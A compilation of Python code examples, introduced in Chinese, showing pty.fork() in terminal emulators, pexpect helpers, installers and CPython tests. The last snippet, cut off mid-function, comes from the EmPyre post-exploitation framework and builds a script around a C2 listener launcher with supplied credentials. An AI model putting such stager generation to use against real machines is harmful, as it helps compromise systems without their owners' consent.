我们从 Python 开源项目中提取了以下 37 个代码示例,用于说明如何使用 pty.fork()。
def run_bg(cmd, debug=False, cwd=''):
    """Start ``cmd`` in the background on a new pseudo-terminal.

    Args:
        cmd: Command to run, either an argument list or a single string
            that is split on whitespace.
        debug: When true, echo the command line to stderr before forking.
        cwd: Directory to change into in the child before exec; the empty
            string leaves the working directory unchanged.

    Returns:
        The ``(child_pid, child_fd)`` pair from ``pty.fork()`` (parent only).

    Raises:
        RunError: If ``pty.fork()`` fails.
    """
    # Make sure 'cmd' is a list of strings.  split() without a separator
    # already discards empty fields.
    if isinstance(cmd, (str, unicode)):
        cmd = cmd.split()

    if debug:
        sys.stderr.write(' '.join(cmd) + '\n')
        sys.stderr.flush()

    try:
        (child_pid, child_fd) = pty.fork()
    except OSError as e:
        raise RunError(cmd, None, message='pty.fork() failed: %s' % str(e))

    if child_pid == 0:
        # Child.  An exception must never unwind back into the caller's
        # code here, otherwise two processes keep running the parent's
        # logic.  Report the failure and terminate the child instead.
        try:
            if cwd != '':
                os.chdir(cwd)
            os.execvp(cmd[0], cmd)
        except Exception as e:
            sys.stderr.write('os.execvp() failed: %s\n' % str(e))
            sys.stderr.flush()
        finally:
            # Only reached when exec did not replace the process image.
            os._exit(127)

    return child_pid, child_fd
def open_terminal(command="bash", columns=80, lines=24):
    """Launch ``command`` on a new pseudo-terminal.

    Args:
        command: Shell-style command line; split with ``shlex.split``.
        columns: Value exported to the child as ``COLUMNS`` and passed to
            ``Terminal``.
        lines: Value exported to the child as ``LINES`` and passed to
            ``Terminal``.

    Returns:
        A ``(Terminal(columns, lines), child_pid, master_file)`` tuple, where
        ``master_file`` is an unbuffered binary file object wrapping the
        non-blocking pty master descriptor.
    """
    p_pid, master_fd = pty.fork()
    if p_pid == 0:  # Child.
        try:
            args = shlex.split(command)
            path = args[0]
            env = dict(TERM="linux", LC_ALL="en_GB.UTF-8",
                       COLUMNS=str(columns), LINES=str(lines))
            os.execvpe(path, args, env)
        except FileNotFoundError:
            print("Could not find the executable in %s. Press any key to exit." % path,
                  flush=True)
        finally:
            # Only reached when exec failed.  Leave with os._exit() so the
            # child never runs the parent's cleanup handlers or code path.
            os._exit(1)

    # Set the non-blocking read flag.  The file *status* flags have to be
    # fetched with F_GETFL; F_GETFD returns the descriptor flags
    # (FD_CLOEXEC), which must not be fed back into F_SETFL.
    flags = fcntl.fcntl(master_fd, fcntl.F_GETFL)
    fcntl.fcntl(master_fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)

    # File-like object for I/O with the child process aka command.
    p_out = os.fdopen(master_fd, "w+b", 0)
    return Terminal(columns, lines), p_pid, p_out
def spawn(self, argv):
    '''
    Run ``argv`` on a fresh pty and return the decoded log.

    Modelled on pty.spawn(): the child execs ``argv``; the parent
    initialises itself, copies data until done, always tears down via
    ``self._del()`` and returns ``self.log`` decoded to text.
    '''
    assert self.master_fd is None
    assert isinstance(argv, list)

    child_pid, pty_fd = pty.fork()
    self.master_fd = pty_fd
    if child_pid == pty.CHILD:
        # exec replaces the child image, so nothing below runs in it.
        os.execvp(argv[0], argv)

    self._init()
    try:
        self._copy()  # start communication
    except Exception:
        # Unexpected error: clean up, then let the caller see it.
        self._del()
        raise
    else:
        self._del()
    return self.log.decode()
def main ():
    """Fork a child on a pty, SIGKILL it, and report what the parent observes.

    Installs ``signal_handler`` (defined elsewhere in this file) for SIGCHLD,
    kills the child after two seconds, probes it with signal 0 and finally
    reads whatever is left on the pty master.
    """
    signal.signal (signal.SIGCHLD, signal_handler)
    pid, fd = pty.fork()
    if pid == 0:
        # Child: emit some output on its stdout (the pty slave), then idle
        # until the parent kills it.
        os.write (sys.stdout.fileno(), 'This is a test.\nThis is a test.')
        time.sleep(10000)
    # Parent.  nonblock() is defined elsewhere -- presumably it switches fd
    # to non-blocking mode; confirm against its definition.
    nonblock (fd)
    tty.setraw(fd) #STDIN_FILENO)
    print 'Sending SIGKILL to child pid:', pid
    time.sleep(2)
    os.kill (pid, signal.SIGKILL)

    print 'Entering to sleep...'
    try:
        # NOTE(review): presumably the SIGCHLD handler is expected to
        # interrupt this sleep by raising -- confirm against signal_handler.
        time.sleep(2)
    except:
        print 'Sleep interrupted'
    try:
        # Signal 0 performs only the existence/permission check.
        os.kill(pid, 0)
        print '\tChild is alive. This is ambiguous because it may be a Zombie.'
    except OSError as e:
        print '\tChild appears to be dead.'
#        print str(e)
    print
    print 'Reading from master fd:', os.read (fd, 1000)
def start_new_process(args, nice_value=0):
    """Run ``args`` on a new pty, optionally reniced, and describe the job.

    The child resets signals via ``default_signals()``, applies
    ``nice_value`` when it is non-zero and execs ``args`` with every
    argument encoded using ``cf['_charset']``.  The parent returns a dict
    holding the start time, pid, master fd, a file object for that fd, the
    command and zeroed progress fields.
    """
    data = {'start_time': time.time()}
    pid, master_fd = pty.fork()

    if pid != CHILD:
        # Parent: record everything needed to track the job.
        data['pid'] = pid
        if os.uname()[0] == "Linux":
            fcntl.fcntl(master_fd, F_SETFL, O_NONBLOCK)
        data['fd'] = master_fd
        data['file'] = os.fdopen(master_fd)
        data['cmd'] = args
        data['buf'] = ""
        for counter in ('otf', 'percent', 'elapsed'):
            data[counter] = 0
    else:
        # Child: never returns once exec succeeds.
        default_signals()
        if nice_value:
            os.nice(nice_value)
        program = args[0]
        encoded_args = [a.encode(cf['_charset'], "replace") for a in args]
        os.execvp(program, encoded_args)

    return data
def spawn(self):
    """Fork onto a new pty and run ``self.command`` in the child.

    ``self.command`` may be a callable (invoked in the child, which then
    always exits with status 0) or an argument list that is exec'ed with
    ``self.env`` plus ``TERM=linux``.  The parent makes the master
    non-blocking when no main loop is set and registers ``self.terminate``
    to run at interpreter exit.
    """
    child_env = self.env
    child_env['TERM'] = 'linux'

    self.pid, self.master = pty.fork()

    if self.pid == 0:
        if not callable(self.command):
            os.execvpe(self.command[0], self.command, child_env)
        else:
            try:
                self.command()
            except:
                # Report anything at all the callable raised.
                sys.stderr.write(traceback.format_exc())
                sys.stderr.flush()
            finally:
                os._exit(0)

    if self.main_loop is None:
        fcntl.fcntl(self.master, fcntl.F_SETFL, os.O_NONBLOCK)

    atexit.register(self.terminate)
def __init__(self, cmd, cwd):
    """Fork onto a new pty and exec ``cmd`` from directory ``cwd``.

    Args:
        cmd: Argument list; ``cmd[0]`` must be the path of the executable
            because ``os.execv`` performs no PATH lookup.
        cwd: Working directory for the child process.

    In the parent, ``self._shell_pid`` and ``self._master_fd`` hold the
    child's pid and the pty master descriptor.
    """
    self._cmd_return_code = 0
    self._cmd_kill_signal = 0

    self._shell_pid, self._master_fd = pty.fork()

    if self._shell_pid == pty.CHILD:
        try:
            os.environ["TERM"] = "linux"
            os.chdir(cwd)
            os.execv(cmd[0], cmd)
        except Exception as err:
            # Written to fd 2, which pty.fork() attached to the pty slave.
            os.write(2, ("failed to start %r: %s\n" % (cmd, err)).encode())
        finally:
            # Only reached when chdir/exec failed.  Without this the child
            # would return from __init__ and run the parent's code.
            os._exit(127)
def restart(self, cmd):
    """Stop the current process (if still running) and start ``cmd`` anew.

    A fresh pipe reports how the child ended ("t" after the command ran,
    "f" when it could not be executed); a fresh pty carries the terminal
    data.  A new TerminalUpdateThread is started on both descriptors.
    """
    if not self.completed:
        self.process_input("\n\033[01;31mProcess killed.\033[00m\r\n")
        os.kill(self.pid, signal.SIGHUP)
        thread = self.thread
        thread.stop()
        # Keep the Qt event loop running while the old thread winds down.
        while thread.alive:
            QCoreApplication.processEvents()

    self.exit_pipe, child_pipe = os.pipe()
    pid, fd = pty.fork()
    if pid == 0:
        # Child: run the command, then report the outcome on child_pipe.
        try:
            os.environ["TERM"] = "xterm-256color"
            retval = subprocess.call(cmd, close_fds=True)
            os.write(2, "\033[01;34mProcess has completed.\033[00m\n")
            os.write(child_pipe, "t")
            os._exit(retval)
        except:
            pass
        # Reached only when something in the try block raised.
        os.write(2, "\033[01;31mCommand '" + cmd[0] + "' failed to execute.\033[00m\n")
        os.write(child_pipe, "f")
        os._exit(1)

    # Parent keeps only the read end of the exit pipe.
    os.close(child_pipe)
    self.process_input("\033[01;34mStarted process with PID %d.\033[00m\r\n" % pid)

    self.pid = pid
    self.data_pipe = fd
    self.completed = False

    # Initialize terminal settings
    fcntl.ioctl(self.data_pipe, termios.TIOCSWINSZ, struct.pack("hhhh", self.rows, self.cols, 0, 0))
    attribute = termios.tcgetattr(self.data_pipe)
    termios.tcsetattr(self.data_pipe, termios.TCSAFLUSH, attribute)

    self.thread = TerminalUpdateThread(self, self.data_pipe, self.exit_pipe)
    self.thread.start()
def spawn(self, argv=None):
    '''
    Create a spawned process.
    Based on the code for pty.spawn().

    The child optionally switches to ``self.group`` / ``self.user`` and
    then execs ``argv`` (default: the shell named by ``$SHELL``).  The
    parent copies data via ``self._copy()`` until an I/O error ends the
    session, then closes the pty master.
    '''
    assert self.master_fd is None
    pid, master_fd = pty.fork()
    self.master_fd = master_fd
    self.pid = pid
    if pid == pty.CHILD:
        # Switch the group BEFORE the user: once setuid() has dropped
        # root, the process is no longer allowed to call setgid().
        if self.group is not None:
            try:
                gid = grp.getgrnam(self.group).gr_gid
            except KeyError:
                log.error("No such group: %s", self.group)
            else:
                os.setgid(gid)
                log.debug('switched group for remote process to %s(%s)', self.group, gid)
        if self.user is not None:
            try:
                uid = pwd.getpwnam(self.user).pw_uid
            except KeyError:
                log.error("No such user: %s", self.user)
            else:
                os.setuid(uid)
                log.debug('switched user for remote process to %s(%s)', self.user, uid)
        # NOTE(review): an unknown user/group is only logged, and the
        # command still runs with the current credentials -- confirm that
        # this fall-through is intended.
        if not argv:
            argv = [os.environ['SHELL']]
        os.execlp(argv[0], *argv)
        # Previous command replaces the process
        return

    self._init_fd()
    try:
        self._copy()
    except (IOError, OSError):
        pass
    finally:
        # Release the master even when _copy() fails unexpectedly.
        os.close(master_fd)
        self.master_fd = None
def __fork_pty(self):
    '''Portable stand-in for the forkpty system call.

    Intended to be more portable than pty.fork(); specifically, this
    should work on Solaris.

    Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
    resolve the issue with Python's pty.fork() not supporting Solaris,
    particularly ssh. Based on patch to posixmodule.c authored by Noah
    Spurrier::

        http://mail.python.org/pipermail/python-dev/2003-May/035281.html

    Returns ``(pid, parent_fd)`` in both the parent and the child.
    '''
    parent_fd, child_fd = os.openpty()
    if parent_fd < 0 or child_fd < 0:
        raise ExceptionPexpect("Could not open with os.openpty().")

    pid = os.fork()
    if pid != pty.CHILD:
        # Parent keeps only its own end of the pty.
        os.close(child_fd)
        return pid, parent_fd

    # Child: adopt the pty as controlling terminal and as stdin/out/err.
    os.close(parent_fd)
    self.__pty_make_controlling_tty(child_fd)
    os.dup2(child_fd, self.STDIN_FILENO)
    os.dup2(child_fd, self.STDOUT_FILENO)
    os.dup2(child_fd, self.STDERR_FILENO)
    return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd):
    '''Make the pseudo-terminal behind ``tty_fd`` the controlling tty.

    Intended to be more portable than pty.fork(); specifically, this
    should work on Solaris.
    '''
    def probe(path, flags):
        # Open and immediately close; only success or failure matters.
        handle = os.open(path, flags)
        os.close(handle)

    child_name = os.ttyname(tty_fd)

    # Disconnect from controlling tty, if any.  Raises OSError of ENXIO
    # if there was no controlling tty to begin with, such as when
    # executed by a cron(1) job.
    try:
        probe("/dev/tty", os.O_RDWR | os.O_NOCTTY)
    except OSError as err:
        if err.errno != errno.ENXIO:
            raise

    os.setsid()

    # Opening /dev/tty again must now fail with ENXIO; success means we
    # are still attached to the old controlling tty.
    try:
        probe("/dev/tty", os.O_RDWR | os.O_NOCTTY)
        raise ExceptionPexpect("OSError of errno.ENXIO should be raised.")
    except OSError as err:
        if err.errno != errno.ENXIO:
            raise

    # Verify we can open child pty.
    probe(child_name, os.O_RDWR)

    # Verify we now have a controlling tty.
    probe("/dev/tty", os.O_WRONLY)
def sig_test (sig_handler_type, fork_type, child_output):
    """Fork a child, SIGKILL it and report whether it still looks alive.

    Args:
        sig_handler_type: 'SIG_IGN' ignores SIGCHLD; any other value
            installs ``signal_handler`` (defined elsewhere in this file).
        fork_type: 'ptyfork' forks with pty.fork(); any other value uses
            os.fork().
        child_output: 'yes' makes the child write two lines to its stdout
            before it goes to sleep.
    """
    print 'Testing with:'
    print '\tsig_handler_type:', sig_handler_type
    print '\tfork_type:', fork_type
    print '\tchild_output:', child_output

    if sig_handler_type == 'SIG_IGN':
        signal.signal (signal.SIGCHLD, signal.SIG_IGN)
    else:
        signal.signal (signal.SIGCHLD, signal_handler)
    pid = -1
    fd = -1
    if fork_type == 'ptyfork':
        pid, fd = pty.fork()
    else:
        pid = os.fork()

    if pid == 0:
        # Child: optionally produce output, then idle until killed.
        if child_output == 'yes':
            os.write (sys.stdout.fileno(), 'This is a test.\nThis is a test.')
        time.sleep(10000)

    #print 'Sending SIGKILL to child pid:', pid
    time.sleep(2)
    os.kill (pid, signal.SIGKILL)

    #print 'Entering to sleep...'
    try:
        time.sleep(2)
    except:
        pass
    try:
        # Signal 0 performs only the existence/permission check.
        os.kill(pid, 0)
        print '\tChild is alive. This is ambiguous because it may be a Zombie.'
    except OSError as e:
        print '\tChild appears to be dead.'
#        print str(e)
    print
def _create(self, rows=24, cols=80):
    """Start a login session on a new pty and register it as a client.

    As root the child execs ``/bin/login``; otherwise it prompts for a
    login name on the pty and execs ``ssh`` to localhost as that user.
    The parent makes the master non-blocking, sets the window size,
    records the session in ``TermSocketHandler.clients`` and returns the
    master file descriptor.
    """
    pid, fd = pty.fork()

    if pid != 0:
        # Parent side.
        fcntl.fcntl(fd, fcntl.F_SETFL, os.O_NONBLOCK)
        window_size = struct.pack('HHHH', rows, cols, 0, 0)
        fcntl.ioctl(fd, termios.TIOCSWINSZ, window_size)
        TermSocketHandler.clients[fd] = {
            'client': self,
            'pid': pid,
            'terminal': Terminal(rows, cols)
        }
        return fd

    # Child side: pick the program that performs the login.
    if os.getuid() == 0:
        cmd = ['/bin/login']
    else:
        # The prompt has to end with a newline character.
        sys.stdout.write(socket.gethostname() + ' login: \n')
        login = sys.stdin.readline().strip()
        cmd = [
            'ssh',
            '-oPreferredAuthentications=keyboard-interactive,password',
            '-oNoHostAuthenticationForLocalhost=yes',
            '-oLogLevel=FATAL',
            '-F/dev/null',
            '-l', login,
            'localhost',
        ]

    env = {
        'COLUMNS': str(cols),
        'LINES': str(rows),
        'PATH': os.environ['PATH'],
        'TERM': 'linux',
    }
    os.execvpe(cmd[0], cmd, env)
def __fork_pty(self):
    """Portable stand-in for the forkpty system call.

    Intended to be more portable than pty.fork(); specifically, this
    should work on Solaris.

    Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
    resolve the issue with Python's pty.fork() not supporting Solaris,
    particularly ssh. Based on patch to posixmodule.c authored by Noah
    Spurrier::

        http://mail.python.org/pipermail/python-dev/2003-May/035281.html

    Returns ``(pid, parent_fd)`` in both the parent and the child.
    """
    parent_fd, child_fd = os.openpty()
    if parent_fd < 0 or child_fd < 0:
        raise ExceptionPexpect("Error! Could not open pty with os.openpty().")

    pid = os.fork()
    if pid < 0:
        raise ExceptionPexpect("Error! Failed os.fork().")

    if pid != 0:
        # Parent keeps only its own end of the pty.
        os.close(child_fd)
        return pid, parent_fd

    # Child: adopt the pty as controlling terminal and as stdin/out/err.
    os.close(parent_fd)
    self.__pty_make_controlling_tty(child_fd)
    for std_fd in (0, 1, 2):
        os.dup2(child_fd, std_fd)
    if child_fd > 2:
        os.close(child_fd)
    return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd):
    """This makes the pseudo-terminal the controlling tty.

    This should be more portable than the pty.fork() function.
    Specifically, this should work on Solaris.

    Args:
        tty_fd: Open descriptor of the pty slave that is to become the
            controlling terminal.

    Raises:
        ExceptionPexpect: If /dev/tty can still be opened after setsid().
        OSError: If the child pty or the new controlling tty cannot be
            opened.
    """
    child_name = os.ttyname(tty_fd)

    # Disconnect from controlling tty if still connected.  The open fails
    # with OSError when there is no controlling tty to begin with (for
    # example when started from cron), which is harmless.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
    except OSError:
        pass
    else:
        if fd >= 0:
            os.close(fd)

    os.setsid()

    # Verify we are disconnected from controlling tty.  Only the OSError
    # from os.open() means success; the failure raised below must NOT be
    # swallowed by the handler.
    try:
        fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
    except OSError:
        # Good! We are disconnected from a controlling tty.
        pass
    else:
        if fd >= 0:
            os.close(fd)
            raise ExceptionPexpect("Error! We are not disconnected from a controlling tty.")

    # Verify we can open child pty.
    fd = os.open(child_name, os.O_RDWR)
    if fd < 0:
        raise ExceptionPexpect("Error! Could not open child pty, " + child_name)
    else:
        os.close(fd)

    # Verify we now have a controlling tty.
    fd = os.open("/dev/tty", os.O_WRONLY)
    if fd < 0:
        raise ExceptionPexpect("Error! Could not open controlling tty, /dev/tty")
    else:
        os.close(fd)
def commit(self):
    """Install ``self.debfile`` with dpkg on a pty and mirror its output.

    The child runs dpkg with a non-interactive environment and exits with
    dpkg's status.  The parent pumps pty output into the console widget
    while keeping the GUI responsive, then collects the exit status and
    updates the dialog.
    """
    # ui
    self.status.setText(_("Installing '%s'...") % os.path.basename(self.debfile))

    # the command
    dpkg = "/usr/bin/dpkg"
    argv = [dpkg, "--auto-deconfigure", "-i", self.debfile]

    self.child_pid, self.master_fd = pty.fork()
    if self.child_pid == 0:
        os.environ["TERM"] = "dumb"
        if "DEBIAN_FRONTEND" not in os.environ:
            os.environ["DEBIAN_FRONTEND"] = "noninteractive"
        os.environ["APT_LISTCHANGES_FRONTEND"] = "none"
        os._exit(subprocess.call(argv))

    while True:
        # Read from pty and write to DumbTerminal
        try:
            readable = select.select([self.master_fd], [], [], 0.001)[0]
            if readable:
                chunk = os.read(self.master_fd, 255)
                self.parent.konsole.insertWithTermCodes(utf8(chunk))
        except Exception as e:
            from errno import EAGAIN
            if hasattr(e, "errno") and e.errno == EAGAIN:
                continue
            break
        KApplication.kApplication().processEvents()

    # at this point we got a read error from the pty, that most
    # likely means that the client is dead
    (pid, status) = os.waitpid(self.child_pid, 0)
    self.exitstatus = os.WEXITSTATUS(status)

    self.progress.setValue(100)
    close_button = self.parent.closeButton
    close_button.setEnabled(True)
    close_button.setVisible(True)
    self.parent.installationProgress.setVisible(False)
    QTimer.singleShot(1, self.parent.changeSize)
def fork(self):
    """Fork onto a new pty and prepare the child's environment.

    Stores the pid and pty master on ``self``.  In the child the
    environment is made non-interactive (TERM, DEBIAN_FRONTEND unless
    already set, APT_LISTCHANGES_FRONTEND).  Returns the pid, which is 0
    in the child.
    """
    self.child_pid, self.master_fd = pty.fork()
    if self.child_pid == 0:
        environ = os.environ
        environ["TERM"] = "dumb"
        # Respect a frontend the caller already chose.
        environ.setdefault("DEBIAN_FRONTEND", "noninteractive")
        environ["APT_LISTCHANGES_FRONTEND"] = "none"
    return self.child_pid
def __init__(self, cmd, raw_debug = None):
    """Create the terminal state and, when ``cmd`` is given, start it on a pty.

    Args:
        cmd: Argument list passed to ``subprocess.call`` in the child; a
            false value creates an idle terminal that only shows a hint.
        raw_debug: Stored on the instance as ``self.raw_debug``.

    Raises:
        RuntimeError: On Windows (``os.name == "nt"``).
    """
    if os.name == "nt":
        raise RuntimeError, "Windows does not support pseudo-terminal devices"

    if cmd:
        # Spawn the new process in a new PTY
        self.exit_pipe, child_pipe = os.pipe()
        self.exit_callback = None

        pid, fd = pty.fork()
        if pid == 0:
            # Child: scrub interpreter/linker overrides from the
            # environment, run the command, then report the outcome
            # ("t" or "f") on child_pipe.
            try:
                os.environ["TERM"] = "xterm-256color"
                if "PYTHONPATH" in os.environ:
                    del(os.environ["PYTHONPATH"])
                if "LD_LIBRARY_PATH" in os.environ:
                    del(os.environ["LD_LIBRARY_PATH"])
                if sys.platform == "darwin":
                    if "DYLD_LIBRARY_PATH" in os.environ:
                        del(os.environ["DYLD_LIBRARY_PATH"])

                retval = subprocess.call(cmd, close_fds=True)
                os.write(2, "\033[01;34mProcess has completed.\033[00m\n")
                os.write(child_pipe, "t")
                os._exit(retval)
            except:
                pass
            # Reached only when something in the try block raised.
            os.write(2, "\033[01;31mCommand '" + cmd[0] + "' failed to execute.\033[00m\n")
            os.write(child_pipe, "f")
            os._exit(1)

        # Parent keeps only the read end of the exit pipe.
        os.close(child_pipe)

        self.pid = pid
        self.data_pipe = fd
    else:
        # No command: mark every handle as absent.
        self.exit_pipe = -1
        self.pid = -1
        self.data_pipe = -1

    self.rows = 25
    self.cols = 80
    self.term = TerminalEmulator(self.rows, self.cols)
    self.raw_debug = raw_debug
    self.completed = False

    self.term.response_callback = self.send_input

    if cmd:
        # Initialize terminal settings
        fcntl.ioctl(self.data_pipe, termios.TIOCSWINSZ, struct.pack("hhhh", self.rows, self.cols, 0, 0))
        attribute = termios.tcgetattr(self.data_pipe)
        termios.tcsetattr(self.data_pipe, termios.TCSAFLUSH, attribute)
    else:
        self.process_input("\033[01;33mEnter desired command arguments, then run again.\033[00m\r\n")
        self.completed = True
def check_input_tty(self, prompt, terminal_input, stdio_encoding=None):
    """Check that input() on a tty returns what was typed on the terminal.

    A child forked onto a pty calls ``input(prompt)`` and reports two
    lines over a pipe: whether its stdio are ttys, and ``ascii()`` of the
    value input() returned.  The parent feeds ``terminal_input`` to the
    pty and compares the round-tripped result.

    Args:
        prompt: Prompt handed to input() in the child.
        terminal_input: Bytes written to the pty master (CR LF appended).
        stdio_encoding: When set, the child re-wraps stdin/stdout with
            this encoding before calling input().
    """
    if not sys.stdin.isatty() or not sys.stdout.isatty():
        self.skipTest("stdin and stdout must be ttys")
    r, w = os.pipe()
    try:
        pid, fd = pty.fork()
    except (OSError, AttributeError) as e:
        os.close(r)
        os.close(w)
        self.skipTest("pty.fork() raised {}".format(e))
    if pid == 0:
        # Child
        try:
            # Make sure we don't get stuck if there's a problem
            signal.alarm(2)
            os.close(r)
            # Check the error handlers are accounted for
            if stdio_encoding:
                sys.stdin = io.TextIOWrapper(sys.stdin.detach(),
                                             encoding=stdio_encoding,
                                             errors='surrogateescape')
                sys.stdout = io.TextIOWrapper(sys.stdout.detach(),
                                              encoding=stdio_encoding,
                                              errors='replace')
            with open(w, "w") as wpipe:
                print("tty =", sys.stdin.isatty() and sys.stdout.isatty(), file=wpipe)
                print(ascii(input(prompt)), file=wpipe)
        except:
            traceback.print_exc()
        finally:
            # We don't want to return to unittest...
            os._exit(0)
    # Parent
    os.close(w)
    os.write(fd, terminal_input + b"\r\n")
    # Get results from the pipe
    with open(r, "r") as rpipe:
        lines = []
        while True:
            line = rpipe.readline().strip()
            if line == "":
                # The other end was closed => the child exited
                break
            lines.append(line)
    # Check the result was got and corresponds to the user's terminal input
    if len(lines) != 2:
        # Something went wrong, try to get at stderr.
        # Read the master with os.read(): Linux raises EIO once the slave
        # is closed, and a buffered read() would turn that into an error
        # that hides the child's output.
        child_output = bytearray()
        while True:
            try:
                chunk = os.read(fd, 3000)
            except OSError:  # Assume EIO
                break
            if not chunk:
                break
            child_output.extend(chunk)
        os.close(fd)
        child_output = child_output.decode("ascii", "ignore")
        self.fail("got %d lines in pipe but expected 2, child output was:\n%s"
                  % (len(lines), child_output))
    os.close(fd)
    # Check we did exercise the GNU readline path
    self.assertIn(lines[0], {'tty = True', 'tty = False'})
    if lines[0] != 'tty = True':
        self.skipTest("standard IO in should have been a tty")
    # ascii() -> eval() roundtrip; the text comes from our own child.
    input_result = eval(lines[1])
    if stdio_encoding:
        expected = terminal_input.decode(stdio_encoding, 'surrogateescape')
    else:
        expected = terminal_input.decode(sys.stdin.encoding)  # what else?
    self.assertEqual(input_result, expected)
def check_input_tty(self, prompt, terminal_input, stdio_encoding=None):
    """Check that input() on a tty returns what was typed on the terminal.

    A child forked onto a pty calls ``input(prompt)`` and reports two
    lines over a pipe: whether its stdio are ttys, and ``ascii()`` of the
    value input() returned.  The parent feeds ``terminal_input`` to the
    pty and compares the round-tripped result.

    Args:
        prompt: Prompt handed to input() in the child.
        terminal_input: Bytes written to the pty master (CR LF appended).
        stdio_encoding: When set, the child re-wraps stdin/stdout with
            this encoding before calling input().
    """
    if not sys.stdin.isatty() or not sys.stdout.isatty():
        self.skipTest("stdin and stdout must be ttys")
    r, w = os.pipe()
    try:
        pid, fd = pty.fork()
    except (OSError, AttributeError) as e:
        os.close(r)
        os.close(w)
        self.skipTest("pty.fork() raised {0}".format(e))
    if pid == 0:
        # Child
        try:
            # Make sure we don't get stuck if there's a problem
            signal.alarm(2)
            os.close(r)
            # Check the error handlers are accounted for
            if stdio_encoding:
                sys.stdin = io.TextIOWrapper(sys.stdin.detach(),
                                             encoding=stdio_encoding,
                                             errors='surrogateescape')
                sys.stdout = io.TextIOWrapper(sys.stdout.detach(),
                                              encoding=stdio_encoding,
                                              errors='replace')
            with open(w, "w") as wpipe:
                print("tty =", sys.stdin.isatty() and sys.stdout.isatty(), file=wpipe)
                print(ascii(input(prompt)), file=wpipe)
        except:
            traceback.print_exc()
        finally:
            # We don't want to return to unittest...
            os._exit(0)
    # Parent
    os.close(w)
    os.write(fd, terminal_input + b"\r\n")
    # Get results from the pipe
    with open(r, "r") as rpipe:
        lines = []
        while True:
            line = rpipe.readline().strip()
            if line == "":
                # The other end was closed => the child exited
                break
            lines.append(line)
    # Check the result was got and corresponds to the user's terminal input
    if len(lines) != 2:
        # Something went wrong, try to get at stderr.
        # Read the master with os.read(): Linux raises EIO once the slave
        # is closed, and a buffered read() would turn that into an error
        # that hides the child's output.
        child_output = bytearray()
        while True:
            try:
                chunk = os.read(fd, 3000)
            except OSError:  # Assume EIO
                break
            if not chunk:
                break
            child_output.extend(chunk)
        os.close(fd)
        child_output = child_output.decode("ascii", "ignore")
        self.fail("got %d lines in pipe but expected 2, child output was:\n%s"
                  % (len(lines), child_output))
    os.close(fd)
    # Check we did exercise the GNU readline path
    self.assertIn(lines[0], set(['tty = True', 'tty = False']))
    if lines[0] != 'tty = True':
        self.skipTest("standard IO in should have been a tty")
    # ascii() -> eval() roundtrip; the text comes from our own child.
    input_result = eval(lines[1])
    if stdio_encoding:
        expected = terminal_input.decode(stdio_encoding, 'surrogateescape')
    else:
        expected = terminal_input.decode(sys.stdin.encoding)  # what else?
    self.assertEqual(input_result, expected)
def __pty_make_controlling_tty(self, tty_fd):
    '''Make the pseudo-terminal behind ``tty_fd`` the controlling tty.

    Intended to be more portable than the pty.fork() function;
    specifically, this should work on Solaris.
    '''
    detach_flags = os.O_RDWR | os.O_NOCTTY
    child_name = os.ttyname(tty_fd)

    # Disconnect from controlling tty. Harmless if not already connected.
    try:
        old_tty = os.open("/dev/tty", detach_flags)
        if old_tty >= 0:
            os.close(old_tty)
    except OSError:
        # Already disconnected. This happens if running inside cron.
        pass

    os.setsid()

    # Verify we are disconnected from controlling tty
    # by attempting to open it again.
    try:
        still_open = os.open("/dev/tty", detach_flags)
        if still_open >= 0:
            os.close(still_open)
            raise Exception('Failed to disconnect from controlling tty. '
                            'It is still possible to open /dev/tty.')
    except OSError:
        # Good! We are disconnected from a controlling tty.
        pass

    # Verify we can open child pty.
    pty_handle = os.open(child_name, os.O_RDWR)
    if pty_handle >= 0:
        os.close(pty_handle)
    else:
        raise Exception("Could not open child pty, " + child_name)

    # Verify we now have a controlling tty.
    ctty_handle = os.open("/dev/tty", os.O_WRONLY)
    if ctty_handle >= 0:
        os.close(ctty_handle)
    else:
        raise Exception("Could not open controlling tty, /dev/tty")
def run_child(self, child, terminal_input):
    """Run ``child(wpipe)`` in a process forked onto a pty; return its report.

    ``terminal_input`` is written to the pty master.  The child is
    expected to write exactly two lines to the pipe it receives; those
    lines (stripped) are returned.  Any other count fails the test with
    the child's terminal output attached.
    """
    r, w = os.pipe()  # Pipe test results from child back to parent
    try:
        pid, fd = pty.fork()
    except (OSError, AttributeError) as e:
        for pipe_end in (r, w):
            os.close(pipe_end)
        self.skipTest("pty.fork() raised {}".format(e))
        raise

    if pid == 0:
        # Child
        try:
            # Make sure we don't get stuck if there's a problem
            signal.alarm(2)
            os.close(r)
            with open(w, "w") as wpipe:
                child(wpipe)
        except:
            traceback.print_exc()
        finally:
            # We don't want to return to unittest...
            os._exit(0)

    # Parent
    os.close(w)
    os.write(fd, terminal_input)

    # Get results from the pipe; an empty line means the other end was
    # closed, i.e. the child exited.
    lines = []
    with open(r, "r") as rpipe:
        for reported in iter(lambda: rpipe.readline().strip(), ""):
            lines.append(reported)

    # Check the result was got and corresponds to the user's terminal input
    if len(lines) != 2:
        # Something went wrong, try to get at stderr
        # Beware of Linux raising EIO when the slave is closed
        captured = bytearray()
        try:
            while True:
                chunk = os.read(fd, 3000)
                if not chunk:
                    break
                captured.extend(chunk)
        except OSError:  # Assume EIO
            pass
        os.close(fd)
        child_output = captured.decode("ascii", "ignore")
        self.fail("got %d lines in pipe but expected 2, child output was:\n%s"
                  % (len(lines), child_output))

    os.close(fd)
    return lines
def generate(self):
    """Return the source text of the script built from this module's options.

    Reads the Login, Password, Listener, UserAgent and LittleSnitch
    options, asks the main menu for a launcher for the listener, and
    substitutes launcher, login and password into the script template.

    Returns:
        The script source as a string, or "" when the listener is not an
        EmPyre listener or no launcher could be generated.
    """
    login = self.options['Login']['Value']
    password = self.options['Password']['Value']
    listenerName = self.options['Listener']['Value']
    userAgent = self.options['UserAgent']['Value']
    littleSnitch = self.options['LittleSnitch']['Value']

    isEmpire = self.mainMenu.listeners.is_listener_empyre(listenerName)
    if not isEmpire:
        print helpers.color("[!] EmPyre listener required!")
        return ""

    # generate the launcher code
    launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=littleSnitch)
    # Backslash-escape both quote characters before the launcher is
